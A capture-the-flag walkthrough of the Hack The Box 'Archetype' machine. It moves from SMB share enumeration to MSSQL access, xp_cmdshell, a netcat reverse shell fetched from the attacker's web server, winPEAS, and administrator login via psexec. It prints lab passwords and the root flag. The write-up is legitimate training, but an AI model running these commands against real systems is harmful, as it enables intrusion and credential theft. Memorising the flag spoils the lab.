Archetype

Task 1: Which TCP port is hosting a database server?

  • Run quick nmap scan

nmap [Target IP]

Port 1433 is hosting a Microsoft SQL Server.

Task 2: What is the name of the non-Administrative share available over SMB?

  • Run the following command

smbclient -N -L \\\\[Target IP]\\
  • -N suppresses the password prompt

  • -L specifies for a list of available shares

Looks like the non-administrative share is backups.

Task 3: What is the password identified in the file on the SMB share?

  • Typically there is an anonymous account that can be used to access public shares.

  • Run the following and hit enter when asked for a password.

smbclient \\\\[Target IP]\\backups -U Anonymous
  • This shows a file in there. Run the following to download the file to your host machine.

get prod.dtsConfig
  • Cat the file.

  • This shows a password of M3g4c0rp123 for user sql_svc and for host ARCHETYPE

Task 4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

  • On Kali, cd into the directory that typically houses impacket tools.

/usr/share/doc/python3-impacket/examples
  • The module that can be used to establish a connection to a MS SQL Server is mssqlclient.py

Task 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

  • Run the following to use the tool with the credentials we recovered from the previous challenge.

python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
  • Utilizing the -windows-auth flag will use Windows Authentification

  • Then run:

help
  • This will display the different options which shows xp_cmdshell will execute a command shell

Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

  • Similar to linPEAS we can use winPEAS to search for privilege escalation paths. Use the link below to download the winPEAS exe.

Task 7: What file contains the administrator's password?

Here are two links to the means of working with this tool and interacting with the database.

  • First start by enabling the command shell

enable_xp_cmdshell
  • Now you can run command shell commands with the following:

xp_cmdshell [CMD]
  • We will want to run command with powershell so we will need to input commands in this format:

xp_cmdshell "powershell -c [Command]"
  • The -c flag issues the command in powershell

  • We will not be able to download files to the current directory because we are in the systems folder which means we would need to be the administrator to do it.

  • We can however download it in the user, sql_svc, Download folder. This directory should be:

C:\Users\sql_svc\Downloads
  • Next is to download a reverse shell for Windows called nc64.exe.

  • Start up a python web server in the directory that you downloaded the reverse shell in.

python3 -m http.server 80
  • Next is to download the reverse shell from the python web server from the target machine with the following command:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://[Host IP]/nc64.exe -outfile nc64.exe"
  • Verify it was successful by checking the web server

  • Start up a netcat listener to port 443 which the reverse shell will connect back to:

nc -lvnp 443
  • Next is to run the reverse shell from the target machine in the Downloads folder.

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.15.41 443"
  • Now check the netcat listener you have set up. You should now have a reverse shell to the system.

  • Now that we have an interactive shell with the target machine, let's download winPEAS and run it on the target machine.

  • Start by downloading winPeas to your host machine and move to the folder that you still have the python web server running on.

  • On your reverse shell redirect to the Downloads folder which you can download files to as the current user.

cd C:\Users\sql-svc\Downloads
  • Run the following command to run powershell for the remaining commands.

powershell
  • Run the next command to download winPEAS to the target machine from the python web server.

wget http://[Host IP]/winPEASx64.exe -outfile winPEASx64.exe
  • Now we want to run winPEAS on the target machine. This will auto-enumerate the machine to look for possible privilege escalation paths and other useful information.

.\winPEASx64.exe
  • At the end of the analysis it will kick out some files it found that it believes are important.

  • The answer to this task is ConsoleHost_history.txt

Capture User Flag:

  • The flag can be found in C:\Users\sql-svc\Desktop\user.txt . Run the following to view it.

type C:\Users\sql_svc\Desktop\user.txt

Capture Root Flag:

  • Looking through the winPEAS output we have found that SeImpersonatePrivilege is enabled

  • This can be exploited using Juicy Potatoes.

  • Before we do that though, let's check the ConsoleHost_history.txt file which is similar to .bash_history file for linux. This will display past commands that were run which may include some important information.

  • Redirect to the following directory and run type to view the file:

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • Looks like we have some juicy credentials for the administrator. Their password is MEGACORP_4dm1n!!

  • Let's open a new tab on the host machine and use the psexec.py tool from Impacket to login to the administrator's account.

cd /usr/share/doc/python3-impacket/examples
python3 psexec.py administrator@[Target IP]

  • The root.txt file is on the administrator's desktop. Run the following to view the file.

type C:\Users\Administrator\Desktop\root.txt

  • The flag is b91ccec3305e98240082d4474b848528

Last updated